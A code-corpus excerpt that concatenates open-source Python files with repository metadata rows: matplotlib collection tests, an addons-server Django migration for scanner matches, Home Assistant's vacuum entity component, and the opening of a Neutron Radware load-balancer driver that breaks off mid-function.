new_positions,
props['linelength'],
props['lineoffset'],
props['orientation'])
splt.set_title('EventCollection: switch_orientation 2x')
@image_comparison(baseline_images=['EventCollection_plot__set_orientation'])
def test__EventCollection__set_orientation():
'''
check to make sure set_orientation works properly
'''
splt, coll, props = generate_EventCollection_plot()
new_orientation = 'vertical'
coll.set_orientation(new_orientation)
assert_equal(new_orientation, coll.get_orientation())
assert_equal(False, coll.is_horizontal())
check_segments(coll,
props['positions'],
props['linelength'],
props['lineoffset'],
new_orientation)
splt.set_title('EventCollection: set_orientation')
splt.set_ylim(-1, 22)
splt.set_xlim(0, 2)
@image_comparison(baseline_images=['EventCollection_plot__set_linelength'])
def test__EventCollection__set_linelength():
'''
check to make sure set_linelength works properly
'''
splt, coll, props = generate_EventCollection_plot()
new_linelength = 15
coll.set_linelength(new_linelength)
assert_equal(new_linelength, coll.get_linelength())
check_segments(coll,
props['positions'],
new_linelength,
props['lineoffset'],
props['orientation'])
splt.set_title('EventCollection: set_linelength')
splt.set_ylim(-20, 20)
@image_comparison(baseline_images=['EventCollection_plot__set_lineoffset'])
def test__EventCollection__set_lineoffset():
'''
check to make sure set_lineoffset works properly
'''
splt, coll, props = generate_EventCollection_plot()
new_lineoffset = -5.
coll.set_lineoffset(new_lineoffset)
assert_equal(new_lineoffset, coll.get_lineoffset())
check_segments(coll,
props['positions'],
props['linelength'],
new_lineoffset,
props['orientation'])
splt.set_title('EventCollection: set_lineoffset')
splt.set_ylim(-6, -4)
@image_comparison(baseline_images=['EventCollection_plot__set_linestyle'])
def test__EventCollection__set_linestyle():
'''
check to make sure set_linestyle works properly
'''
splt, coll, _ = generate_EventCollection_plot()
new_linestyle = 'dashed'
coll.set_linestyle(new_linestyle)
assert_equal(coll.get_linestyle(), [(0, (6.0, 6.0))])
splt.set_title('EventCollection: set_linestyle')
@image_comparison(baseline_images=['EventCollection_plot__set_ls_dash'],
remove_text=True)
def test__EventCollection__set_linestyle_single_dash():
'''
check to make sure set_linestyle accepts a single dash pattern
'''
splt, coll, _ = generate_EventCollection_plot()
new_linestyle = (0, (6., 6.))
coll.set_linestyle(new_linestyle)
assert_equal(coll.get_linestyle(), [(0, (6.0, 6.0))])
splt.set_title('EventCollection: set_linestyle')
@image_comparison(baseline_images=['EventCollection_plot__set_linewidth'])
def test__EventCollection__set_linewidth():
'''
    check to make sure set_linewidth works properly
'''
splt, coll, _ = generate_EventCollection_plot()
new_linewidth = 5
coll.set_linewidth(new_linewidth)
assert_equal(coll.get_linewidth(), new_linewidth)
splt.set_title('EventCollection: set_linewidth')
@image_comparison(baseline_images=['EventCollection_plot__set_color'])
def test__EventCollection__set_color():
'''
check to make sure set_color works properly
'''
splt, coll, _ = generate_EventCollection_plot()
new_color = np.array([0, 1, 1, 1])
coll.set_color(new_color)
np.testing.assert_array_equal(new_color, coll.get_color())
check_allprop_array(coll.get_colors(), new_color)
splt.set_title('EventCollection: set_color')
def check_segments(coll, positions, linelength, lineoffset, orientation):
'''
check to make sure all values in the segment are correct, given a
particular set of inputs
note: this is not a test, it is used by tests
'''
segments = coll.get_segments()
    if (orientation is None or orientation.lower() == 'horizontal'
            or orientation.lower() == 'none'):
# if horizontal, the position in is in the y-axis
pos1 = 1
pos2 = 0
elif orientation.lower() == 'vertical':
# if vertical, the position in is in the x-axis
pos1 = 0
pos2 = 1
else:
raise ValueError("orientation must be 'horizontal' or 'vertical'")
# test to make sure each segment is correct
for i, segment in enumerate(segments):
assert_equal(segment[0, pos1], lineoffset + linelength / 2.)
assert_equal(segment[1, pos1], lineoffset - linelength / 2.)
assert_equal(segment[0, pos2], positions[i])
assert_equal(segment[1, pos2], positions[i])
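# Illustrative example of the layout verified above (assumed values, not a
# test): for a horizontal collection with lineoffset=1 and linelength=0.5,
# the segment for position p is [[p, 1.25], [p, 0.75]] -- the event position
# lands on the x-axis while the line spans lineoffset +/- linelength / 2 on
# the y-axis; a vertical collection simply swaps the two columns.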
def check_allprop(values, target):
'''
check to make sure all values match the given target
note: this is not a test, it is used by tests
'''
for value in values:
assert_equal(value, target)
def check_allprop_array(values, target):
'''
check to make sure all values match the given target if arrays
note: this is not a test, it is used by tests
'''
for value in values:
np.testing.assert_array_equal(value, target)
def test_null_collection_datalim():
col = mcollections.PathCollection([])
col_data_lim = col.get_datalim(mtransforms.IdentityTransform())
assert_array_equal(col_data_lim.get_points(),
mtransforms.Bbox.null().get_points())
@cleanup
def test_add_collection():
# Test if data limits are unchanged by adding an empty collection.
# Github issue #1490, pull #1497.
plt.figure()
ax = plt.axes()
coll = ax.scatter([0, 1], [0, 1])
ax.add_collection(coll)
bounds = ax.dataLim.bounds
coll = ax.scatter([], [])
assert_equal(ax.dataLim.bounds, bounds)
@cleanup
def test_quiver_limits():
ax = plt.axes()
x, y = np.arange(8), np.arange(10)
data = u = v = np.linspace(0, 10, 80).reshape(10, 8)
q = plt.quiver(x, y, u, v)
assert_equal(q.get_datalim(ax.transData).bounds, (0., 0., 7., 9.))
plt.figure()
ax = plt.axes()
x = np.linspace(-5, 10, 20)
y = np.linspace(-2, 4, 10)
y, x = np.meshgrid(y, x)
trans = mtransforms.Affine2D().translate(25, 32) + ax.transData
plt.quiver(x, y, np.sin(x), np.cos(y), transform=trans)
assert_equal(ax.dataLim.bounds, (20.0, 30.0, 15.0, 6.0))
@cleanup
def test_barb_limits():
ax = plt.axes()
x = np.linspace(-5, 10, 20)
y = np.linspace(-2, 4, 10)
y, x = np.meshgrid(y, x)
trans = mtransforms.Affine2D().translate(25, 32) + ax.transData
plt.barbs(x, y, np.sin(x), np.cos(y), transform=trans)
# The calculated bounds are approximately the bounds of the original data,
# this is because the entire path is taken into account when updating the
# datalim.
assert_array_almost_equal(ax.dataLim.bounds, (20, 30, 15, 6),
decimal=1)
@image_comparison(baseline_images=['EllipseCollection_test_image'],
extensions=['png'],
remove_text=True)
def test_EllipseCollection():
# Test basic functionality
fig, ax = plt.subplots()
x = np.arange(4)
y = np.arange(3)
X, Y = np.meshgrid(x, y)
XY = np.vstack((X.ravel(), Y.ravel())).T
ww = X/float(x[-1])
hh = Y/float(y[-1])
aa = np.ones_like(ww) * 20 # first axis is 20 degrees CCW from x axis
ec = mcollections.EllipseCollection(ww, hh, aa,
units='x',
offsets=XY,
transOffset=ax.transData,
facecolors='none')
ax.add_collection(ec)
ax.autoscale_view()
@image_comparison(baseline_images=['polycollection_close'],
extensions=['png'], remove_text=True)
def test_polycollection_close():
from mpl_toolkits.mplot3d import Axes3D
vertsQuad = [
[[0., 0.], [0., 1.], [1., 1.], [1., 0.]],
[[0., 1.], [2., 3.], [2., 2.], [1., 1.]],
[[2., 2.], [2., 3.], [4., 1.], [3., 1.]],
[[3., 0.], [3., 1.], [4., 1.], [4., 0.]]]
fig = plt.figure()
ax = Axes3D(fig)
colors = ['r', 'g', 'b', 'y', 'k']
zpos = list(range(5))
poly = mcollections.PolyCollection(
vertsQuad * len(zpos), linewidth=0.25)
poly.set_alpha(0.7)
# need to have a z-value for *each* polygon = element!
zs = []
cs = []
for z, c in zip(zpos, colors):
zs.extend([z] * len(vertsQuad))
cs.extend([c] * len(vertsQuad))
poly.set_color(cs)
ax.add_collection3d(poly, zs=zs, zdir='y')
# axis limit settings:
ax.set_xlim3d(0, 4)
ax.set_zlim3d(0, 3)
ax.set_ylim3d(0, 4)
@image_comparison(baseline_images=['regularpolycollection_rotate'],
extensions=['png'], remove_text=True)
def test_regularpolycollection_rotate():
xx, yy = np.mgrid[:10, :10]
xy_points = np.transpose([xx.flatten(), yy.flatten()])
rotations = np.linspace(0, 2*np.pi, len(xy_points))
fig, ax = plt.subplots()
for xy, alpha in zip(xy_points, rotations):
col = mcollections.RegularPolyCollection(
4, sizes=(100,), rotation=alpha,
offsets=xy, transOffset=ax.transData)
ax.add_collection(col, autolim=True)
ax.autoscale_view()
@image_comparison(baseline_images=['regularpolycollection_scale'],
extensions=['png'], remove_text=True)
def test_regularpolycollection_scale():
# See issue #3860
class SquareCollection(mcollections.RegularPolyCollection):
def __init__(self, **kwargs):
super(SquareCollection, self).__init__(
4, rotation=np.pi/4., **kwargs)
def get_transform(self):
"""Return transform scaling circle areas to data space."""
ax = self.axes
pts2pixels = 72.0 / ax.figure.dpi
scale_x = pts2pixels * ax.bbox.width / ax.viewLim.width
scale_y = pts2pixels * ax.bbox.height / ax.viewLim.height
return mtransforms.Affine2D().scale(scale_x, scale_y)
fig, ax = plt.subplots()
xy = [(0, 0)]
# Unit square has a half-diagonal of `1 / sqrt(2)`, so `pi * r**2`
# equals...
circle_areas = [np.pi / 2]
squares = SquareCollection(sizes=circle_areas, offsets=xy,
transOffset=ax.transData)
ax.add_collection(squares, autolim=True)
ax.axis([-1, 1, -1, 1])
@cleanup
def test_picking():
fig, ax = plt.subplots()
col = ax.scatter([0], [0], [1000], picker=True)
fig.savefig(io.BytesIO(), dpi=fig.dpi)
class MouseEvent(object):
pass
event = MouseEvent()
event.x = 325
event.y = 240
found, indices = col.contains(event)
assert found
assert_array_equal(indices['ind'], [0])
@cleanup
def test_linestyle_single_dashes():
plt.scatter([0, 1, 2], [0, 1, 2], linestyle=(0., [2., 2.]))
plt.draw()
@image_comparison(baseline_images=['size_in_xy'], remove_text=True,
extensions=['png'])
def test_size_in_xy():
fig, ax = plt.subplots()
widths, heights, angles = (10, 10), 10, 0
widths = 10, 10
coords = [(10, 10), (15, 15)]
e = mcollections.EllipseCollection(
widths, heights, angles,
units='xy',
offsets=coords,
transOffset=ax.transData)
ax.add_collection(e)
ax.set_xlim(0, 30)
ax.set_ylim(0, 30)
@cleanup
def test_pandas_indexing():
try:
import pandas as pd
except ImportError:
raise SkipTest("Pandas not installed")
    # Should not break when faced with a
# non-zero indexed series
index = [11, 12, 13]
ec = fc = pd.Series(['red', 'blue', 'green'], index=index)
lw = pd.Series([1, 2, 3], index=index)
ls = pd.Series(['solid', 'dashed', 'dashdot'], index=index)
aa = pd.Series([True, False, True], index=index)
Collection(edgecolors=ec)
Collection(facecolors=fc)
Collection(linewidths=lw)
Collection(linestyles=ls)
Collection(antialiaseds=aa)
@cleanup(style='default')
def test_lslw_bcast():
col = mcollections.PathCollection([])
col.set_linestyles(['-', '-'])
col.set_linewidths([1, 2, 3])
assert col.get_linestyles() == [(None, None)] * 6
assert col.get_linewidths() == [1, 2, 3] * 2
col.set_linestyles(['-', '-', '-'])
assert col.get_linestyles() == [(None, None)] * 3
assert col.get_linewidths() == [1, 2, 3]
if __name__ == '__main__':
import nose
nose.runmodule(argv=['-s', '--with-doctest'], exit=False)
|
unnikrishnankgs/va
|
venv/lib/python3.5/site-packages/matplotlib/tests/test_collections.py
|
Python
|
bsd-2-clause
| 21,429 | 0 |
# Generated by Django 2.2.6 on 2019-10-23 09:06
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import olympia.amo.models
class Migration(migrations.Migration):
dependencies = [
('scanners', '0008_auto_20191021_1718'),
]
operations = [
migrations.CreateModel(
name='ScannerMatch',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(blank=True, default=django.utils.timezone.now, editable=False)),
('modified', models.DateTimeField(auto_now=True)),
('result', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='scanners.ScannerResult')),
('rule', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='scanners.ScannerRule')),
],
options={
'get_latest_by': 'created',
'abstract': False,
'base_manager_name': 'objects',
},
bases=(olympia.amo.models.SearchMixin, olympia.amo.models.SaveUpdateMixin, models.Model),
),
migrations.AddField(
model_name='scannerresult',
name='matched_rules',
field=models.ManyToManyField(through='scanners.ScannerMatch', to='scanners.ScannerRule'),
),
]
|
bqbn/addons-server
|
src/olympia/scanners/migrations/0009_auto_20191023_0906.py
|
Python
|
bsd-3-clause
| 1,450 | 0.004138 |
"""Support for vacuum cleaner robots (botvacs)."""
from dataclasses import dataclass
from datetime import timedelta
from functools import partial
import logging
from typing import final
import voluptuous as vol
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import ( # noqa: F401 # STATE_PAUSED/IDLE are API
ATTR_BATTERY_LEVEL,
ATTR_COMMAND,
SERVICE_TOGGLE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_IDLE,
STATE_ON,
STATE_PAUSED,
)
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.config_validation import ( # noqa: F401
PLATFORM_SCHEMA,
PLATFORM_SCHEMA_BASE,
make_entity_service_schema,
)
from homeassistant.helpers.entity import (
Entity,
EntityDescription,
ToggleEntity,
ToggleEntityDescription,
)
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.helpers.icon import icon_for_battery_level
from homeassistant.helpers.typing import ConfigType
from homeassistant.loader import bind_hass
# mypy: allow-untyped-defs, no-check-untyped-defs
_LOGGER = logging.getLogger(__name__)
DOMAIN = "vacuum"
ENTITY_ID_FORMAT = DOMAIN + ".{}"
SCAN_INTERVAL = timedelta(seconds=20)
ATTR_BATTERY_ICON = "battery_icon"
ATTR_CLEANED_AREA = "cleaned_area"
ATTR_FAN_SPEED = "fan_speed"
ATTR_FAN_SPEED_LIST = "fan_speed_list"
ATTR_PARAMS = "params"
ATTR_STATUS = "status"
SERVICE_CLEAN_SPOT = "clean_spot"
SERVICE_LOCATE = "locate"
SERVICE_RETURN_TO_BASE = "return_to_base"
SERVICE_SEND_COMMAND = "send_command"
SERVICE_SET_FAN_SPEED = "set_fan_speed"
SERVICE_START_PAUSE = "start_pause"
SERVICE_START = "start"
SERVICE_PAUSE = "pause"
SERVICE_STOP = "stop"
STATE_CLEANING = "cleaning"
STATE_DOCKED = "docked"
STATE_RETURNING = "returning"
STATE_ERROR = "error"
STATES = [STATE_CLEANING, STATE_DOCKED, STATE_RETURNING, STATE_ERROR]
DEFAULT_NAME = "Vacuum cleaner robot"
SUPPORT_TURN_ON = 1
SUPPORT_TURN_OFF = 2
SUPPORT_PAUSE = 4
SUPPORT_STOP = 8
SUPPORT_RETURN_HOME = 16
SUPPORT_FAN_SPEED = 32
SUPPORT_BATTERY = 64
SUPPORT_STATUS = 128
SUPPORT_SEND_COMMAND = 256
SUPPORT_LOCATE = 512
SUPPORT_CLEAN_SPOT = 1024
SUPPORT_MAP = 2048
SUPPORT_STATE = 4096
SUPPORT_START = 8192
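# The SUPPORT_* values above are bit flags; an integration advertises its
# capabilities by OR-ing them together, for example (hypothetical
# combination, not taken from any real platform):
#   supported_features = SUPPORT_STATE | SUPPORT_START | SUPPORT_STOP | SUPPORT_BATTERY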
@bind_hass
def is_on(hass, entity_id):
"""Return if the vacuum is on based on the statemachine."""
return hass.states.is_state(entity_id, STATE_ON)
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
"""Set up the vacuum component."""
component = hass.data[DOMAIN] = EntityComponent(
_LOGGER, DOMAIN, hass, SCAN_INTERVAL
)
await component.async_setup(config)
component.async_register_entity_service(SERVICE_TURN_ON, {}, "async_turn_on")
component.async_register_entity_service(SERVICE_TURN_OFF, {}, "async_turn_off")
component.async_register_entity_service(SERVICE_TOGGLE, {}, "async_toggle")
component.async_register_entity_service(
SERVICE_START_PAUSE, {}, "async_start_pause"
)
component.async_register_entity_service(SERVICE_START, {}, "async_start")
component.async_register_entity_service(SERVICE_PAUSE, {}, "async_pause")
component.async_register_entity_service(
SERVICE_RETURN_TO_BASE, {}, "async_return_to_base"
)
component.async_register_entity_service(SERVICE_CLEAN_SPOT, {}, "async_clean_spot")
component.async_register_entity_service(SERVICE_LOCATE, {}, "async_locate")
component.async_register_entity_service(SERVICE_STOP, {}, "async_stop")
component.async_register_entity_service(
SERVICE_SET_FAN_SPEED,
{vol.Required(ATTR_FAN_SPEED): cv.string},
"async_set_fan_speed",
)
component.async_register_entity_service(
SERVICE_SEND_COMMAND,
{
vol.Required(ATTR_COMMAND): cv.string,
vol.Optional(ATTR_PARAMS): vol.Any(dict, cv.ensure_list),
},
"async_send_command",
)
return True
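# With the entity services registered above, a fan-speed change can be
# requested through the service registry, e.g. (hypothetical entity id,
# shown only as a usage sketch):
#   await hass.services.async_call(
#       DOMAIN, SERVICE_SET_FAN_SPEED,
#       {"entity_id": "vacuum.example", ATTR_FAN_SPEED: "high"},
#       blocking=True)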
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up a config entry."""
component: EntityComponent = hass.data[DOMAIN]
return await component.async_setup_entry(entry)
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
component: EntityComponent = hass.data[DOMAIN]
return await component.async_unload_entry(entry)
class _BaseVacuum(Entity):
"""Representation of a base vacuum.
Contains common properties and functions for all vacuum devices.
"""
@property
def supported_features(self):
"""Flag vacuum cleaner features that are supported."""
raise NotImplementedError()
@property
def battery_level(self):
"""Return the battery level of the vacuum cleaner."""
return None
@property
def battery_icon(self):
"""Return the battery icon for the vacuum cleaner."""
raise NotImplementedError()
@property
def fan_speed(self):
"""Return the fan speed of the vacuum cleaner."""
return None
@property
def fan_speed_list(self):
"""Get the list of available fan speed steps of the vacuum cleaner."""
raise NotImplementedError()
@property
def capability_attributes(self):
"""Return capability attributes."""
if self.supported_features & SUPPORT_FAN_SPEED:
return {ATTR_FAN_SPEED_LIST: self.fan_speed_list}
@property
def state_attributes(self):
"""Return the state attributes of the vacuum cleaner."""
data = {}
if self.supported_features & SUPPORT_BATTERY:
data[ATTR_BATTERY_LEVEL] = self.battery_level
data[ATTR_BATTERY_ICON] = self.battery_icon
if self.supported_features & SUPPORT_FAN_SPEED:
data[ATTR_FAN_SPEED] = self.fan_speed
return data
def stop(self, **kwargs):
"""Stop the vacuum cleaner."""
raise NotImplementedError()
async def async_stop(self, **kwargs):
"""Stop the vacuum cleaner.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(partial(self.stop, **kwargs))
def return_to_base(self, **kwargs):
"""Set the vacuum cleaner to return to the dock."""
raise NotImplementedError()
async def async_return_to_base(self, **kwargs):
"""Set the vacuum cleaner to return to the dock.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(partial(self.return_to_base, **kwargs))
def clean_spot(self, **kwargs):
"""Perform a spot clean-up."""
raise NotImplementedError()
async def async_clean_spot(self, **kwargs):
"""Perform a spot clean-up.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(partial(self.clean_spot, **kwargs))
def locate(self, **kwargs):
"""Locate the vacuum cleaner."""
raise NotImplementedError()
async def async_locate(self, **kwargs):
"""Locate the vacuum cleaner.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(partial(self.locate, **kwargs))
def set_fan_speed(self, fan_speed, **kwargs):
"""Set fan speed."""
raise NotImplementedError()
async def async_set_fan_speed(self, fan_speed, **kwargs):
"""Set fan speed.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(
partial(self.set_fan_speed, fan_speed, **kwargs)
)
def send_command(self, command, params=None, **kwargs):
"""Send a command to a vacuum cleaner."""
raise NotImplementedError()
async def async_send_command(self, command, params=None, **kwargs):
"""Send a command to a vacuum cleaner.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(
partial(self.send_command, command, params=params, **kwargs)
)
@dataclass
class VacuumEntityDescription(ToggleEntityDescription):
"""A class that describes vacuum entities."""
class VacuumEntity(_BaseVacuum, ToggleEntity):
"""Representation of a vacuum cleaner robot."""
entity_description: VacuumEntityDescription
@property
def status(self):
"""Return the status of the vacuum cleaner."""
return None
@property
def battery_icon(self):
"""Return the battery icon for the vacuum cleaner."""
charging = False
if self.status is not None:
charging = "charg" in self.status.lower()
return icon_for_battery_level(
battery_level=self.battery_level, charging=charging
)
@final
@property
def state_attributes(self):
"""Return the state attributes of the vacuum cleaner."""
data = super().state_attributes
if self.supported_features & SUPPORT_STATUS:
data[ATTR_STATUS] = self.status
return data
def turn_on(self, **kwargs):
"""Turn the vacuum on and start cleaning."""
raise NotImplementedError()
async def async_turn_on(self, **kwargs):
"""Turn the vacuum on and start cleaning.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(partial(self.turn_on, **kwargs))
def turn_off(self, **kwargs):
"""Turn the vacuum off stopping the cleaning and returning home."""
raise NotImplementedError()
async def async_turn_off(self, **kwargs):
"""Turn the vacuum off stopping the cleaning and returning home.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(partial(self.turn_off, **kwargs))
def start_pause(self, **kwargs):
"""Start, pause or resume the cleaning task."""
raise NotImplementedError()
async def async_start_pause(self, **kwargs):
"""Start, pause or resume the cleaning task.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(partial(self.start_pause, **kwargs))
async def async_pause(self):
"""Not supported."""
async def async_start(self):
"""Not supported."""
@dataclass
class StateVacuumEntityDescription(EntityDescription):
"""A class that describes vacuum entities."""
class StateVacuumEntity(_BaseVacuum):
"""Representation of a vacuum cleaner robot that supports states."""
entity_description: StateVacuumEntityDescription
@property
def state(self):
"""Return the state of the vacuum cleaner."""
return None
@property
def battery_icon(self):
"""Return the battery icon for the vacuum cleaner."""
charging = bool(self.state == STATE_DOCKED)
return icon_for_battery_level(
battery_level=self.battery_level, charging=charging
)
def start(self):
"""Start or resume the cleaning task."""
raise NotImplementedError()
async def async_start(self):
"""Start or resume the cleaning task.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(self.start)
def pause(self):
"""Pause the cleaning task."""
raise NotImplementedError()
async def async_pause(self):
"""Pause the cleaning task.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(self.pause)
async def async_turn_on(self, **kwargs):
"""Not supported."""
async def async_turn_off(self, **kwargs):
"""Not supported."""
async def async_toggle(self, **kwargs):
"""Not supported."""
|
rohitranjan1991/home-assistant
|
homeassistant/components/vacuum/__init__.py
|
Python
|
mit
| 11,915 | 0.000587 |
# Copyright 2013 Radware LTD.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Avishay Balderman, Radware
import base64
import copy
import httplib
import netaddr
import threading
import time
import eventlet
eventlet.monkey_patch(thread=True)
from oslo.config import cfg
from six.moves import queue as Queue
from neutron.api.v2 import attributes
from neutron.common import log as call_log
from neutron import context
from neutron.db.loadbalancer import loadbalancer_db as lb_db
from neutron.extensions import loadbalancer
from neutron.openstack.common import excutils
from neutron.openstack.common import jsonutils
from neutron.openstack.common import log as logging
from neutron.plugins.common import constants
from neutron.services.loadbalancer.drivers import abstract_driver
from neutron.services.loadbalancer.drivers.radware import exceptions as r_exc
LOG = logging.getLogger(__name__)
RESP_STATUS = 0
RESP_REASON = 1
RESP_STR = 2
RESP_DATA = 3
TEMPLATE_HEADER = {'Content-Type':
'application/vnd.com.radware.vdirect.'
'template-parameters+json'}
PROVISION_HEADER = {'Content-Type':
'application/vnd.com.radware.'
'vdirect.status+json'}
CREATE_SERVICE_HEADER = {'Content-Type':
'application/vnd.com.radware.'
'vdirect.adc-service-specification+json'}
driver_opts = [
cfg.StrOpt('vdirect_address',
help=_('IP address of vDirect server.')),
cfg.StrOpt('ha_secondary_address',
help=_('IP address of secondary vDirect server.')),
cfg.StrOpt('vdirect_user',
default='vDirect',
help=_('vDirect user name.')),
cfg.StrOpt('vdirect_password',
default='radware',
help=_('vDirect user password.')),
cfg.StrOpt('service_adc_type',
default="VA",
help=_('Service ADC type. Default: VA.')),
cfg.StrOpt('service_adc_version',
default="",
help=_('Service ADC version.')),
cfg.BoolOpt('service_ha_pair',
default=False,
help=_('Enables or disables the Service HA pair. '
'Default: False.')),
cfg.IntOpt('service_throughput',
default=1000,
help=_('Service throughput. Default: 1000.')),
cfg.IntOpt('service_ssl_throughput',
default=100,
help=_('Service SSL throughput. Default: 100.')),
cfg.IntOpt('service_compression_throughput',
default=100,
help=_('Service compression throughput. Default: 100.')),
cfg.IntOpt('service_cache',
default=20,
help=_('Size of service cache. Default: 20.')),
cfg.StrOpt('l2_l3_workflow_name',
default='openstack_l2_l3',
help=_('Name of l2_l3 workflow. Default: '
'openstack_l2_l3.')),
cfg.StrOpt('l4_workflow_name',
default='openstack_l4',
help=_('Name of l4 workflow. Default: openstack_l4.')),
cfg.DictOpt('l2_l3_ctor_params',
default={"service": "_REPLACE_",
"ha_network_name": "HA-Network",
"ha_ip_pool_name": "default",
"allocate_ha_vrrp": True,
"allocate_ha_ips": True,
"twoleg_enabled": "_REPLACE_"},
help=_('Parameter for l2_l3 workflow constructor.')),
cfg.DictOpt('l2_l3_setup_params',
default={"data_port": 1,
"data_ip_address": "192.168.200.99",
"data_ip_mask": "255.255.255.0",
"gateway": "192.168.200.1",
"ha_port": 2},
help=_('Parameter for l2_l3 workflow setup.')),
cfg.ListOpt('actions_to_skip',
default=['setup_l2_l3'],
help=_('List of actions that are not pushed to '
'the completion queue.')),
cfg.StrOpt('l4_action_name',
default='BaseCreate',
help=_('Name of the l4 workflow action. '
'Default: BaseCreate.')),
cfg.ListOpt('service_resource_pool_ids',
default=[],
help=_('Resource pool IDs.')),
cfg.IntOpt('service_isl_vlan',
default=-1,
help=_('A required VLAN for the interswitch link to use.')),
cfg.BoolOpt('service_session_mirroring_enabled',
default=False,
help=_('Enable or disable Alteon interswitch link for '
'stateful session failover. Default: False.'))
]
cfg.CONF.register_opts(driver_opts, "radware")
class LoadBalancerDriver(abstract_driver.LoadBalancerAbstractDriver):
"""Radware lbaas driver."""
def __init__(self, plugin):
rad = cfg.CONF.radware
self.plugin = plugin
self.service = {
"haPair": rad.service_ha_pair,
"sessionMirroringEnabled": rad.service_session_mirroring_enabled,
"primary": {
"capacity": {
"throughput": rad.service_throughput,
"sslThroughput": rad.service_ssl_throughput,
"compressionThroughput":
rad.service_compression_throughput,
"cache": rad.service_cache
},
"network": {
"type": "portgroup",
"portgroups": ['DATA_NETWORK']
},
"adcType": rad.service_adc_type,
"acceptableAdc": "Exact"
}
}
if rad.service_resource_pool_ids:
ids = rad.service_resource_pool_ids
self.service['resourcePoolIds'] = [
{'name': id} for id in ids
]
if rad.service_isl_vlan:
self.service['islVlan'] = rad.service_isl_vlan
self.l2_l3_wf_name = rad.l2_l3_workflow_name
self.l4_wf_name = rad.l4_workflow_name
self.l2_l3_ctor_params = rad.l2_l3_ctor_params
self.l2_l3_setup_params = rad.l2_l3_setup_params
self.l4_action_name = rad.l4_action_name
self.actions_to_skip = rad.actions_to_skip
vdirect_address = rad.vdirect_address
sec_server = rad.ha_secondary_address
self.rest_client = vDirectRESTClient(server=vdirect_address,
secondary_server=sec_server,
user=rad.vdirect_user,
password=rad.vdirect_password)
self.queue = Queue.Queue()
self.completion_handler = OperationCompletionHandler(self.queue,
self.rest_client,
plugin)
self.workflow_templates_exists = False
self.completion_handler.setDaemon(True)
self.completion_handler_started = False
def _populate_vip_graph(self, context, vip):
ext_vip = self.plugin.populate_vip_graph(context, vip)
vip_network_id = self._get_vip_network_id(context, ext_vip)
pool_network_id = self._get_pool_network_id(context, ext_vip)
# if VIP and PIP are different, we need an IP address for the PIP
# so create port on PIP's network and use its IP address
if vip_network_id != pool_network_id:
pip_address = self._get_pip(
context,
vip['tenant_id'],
_make_pip_name_from_vip(vip),
pool_network_id,
ext_vip['pool']['subnet_id'])
ext_vip['pip_address'] = pip_address
else:
ext_vip['pip_address'] = vip['address']
ext_vip['vip_network_id'] = vip_network_id
ext_vip['pool_network_id'] = pool_network_id
return ext_vip
def create_vip(self, context, vip):
log_info = {'vip': vip,
'extended_vip': 'NOT_ASSIGNED',
'service_name': 'NOT_ASSIGNED'}
try:
ext_vip = self._populate_vip_graph(context, vip)
service_name = self._get_service(ext_vip)
log_info['extended_vip'] = ext_vip
log_info['service_name'] = service_name
self._create_workflow(
vip['pool_id'], self.l4_wf_name,
{"service": service_name})
self._update_workflow(
vip['pool_id'],
self.l4_action_name, ext_vip, context)
finally:
LOG.debug(_('vip: %(vip)s, '
'extended_vip: %(extended_vip)s, '
'service_name: %(service_name)s, '),
log_info)
def update_vip(self, context, old_vip, vip):
ext_vip = self._populate_vip_graph(context, vip)
self._update_workflow(
vip['pool_id'], self.l4_action_name,
ext_vip, context, False, lb_db.Vip, vip['id'])
def delete_vip(self, context, vip):
"""Delete a Vip
First delete it from the device. If deletion ended OK
- remove data from DB as well.
If the deletion failed - mark vip with error status in DB
"""
ext_vip = self._populate_vip_graph(context, vip)
params = _translate_vip_object_graph(ext_vip,
self.plugin, context)
ids = params.pop('__ids__')
try:
# get neutron port id associated with the vip (present if vip and
# pip are different) and release it after workflow removed
port_filter = {
'name': [_make_pip_name_from_vip(vip)],
}
ports = self.plugin._core_plugin.get_ports(context,
filters=port_filter)
if ports:
LOG.debug(_('Retrieved pip nport: %(port)r for '
'vip: %(vip)s'), {'port': ports[0],
'vip': vip['id']})
delete_pip_nport_function = self._get_delete_pip_nports(
context, ports)
else:
delete_pip_nport_function = None
LOG.debug(_('Found no pip nports associated with '
'vip: %s'), vip['id'])
# removing the WF will cause deletion of the configuration from the
# device
self._remove_workflow(ids, context, delete_pip_nport_function)
except r_exc.RESTRequestFailure:
pool_id = ext_vip['pool_id']
LOG.exception(_('Failed to remove workflow %s. '
'Going to set vip to ERROR status'),
pool_id)
self.plugin.update_status(context, lb_db.Vip, ids['vip'],
constants.ERROR)
def _get_delete_pip_nports(self, context, ports):
def _delete_pip_nports(success):
if success:
for port in ports:
try:
self.plugin._core_plugin.delete_port(
context, port['id'])
LOG.debug(_('pip nport id: %s'), port['id'])
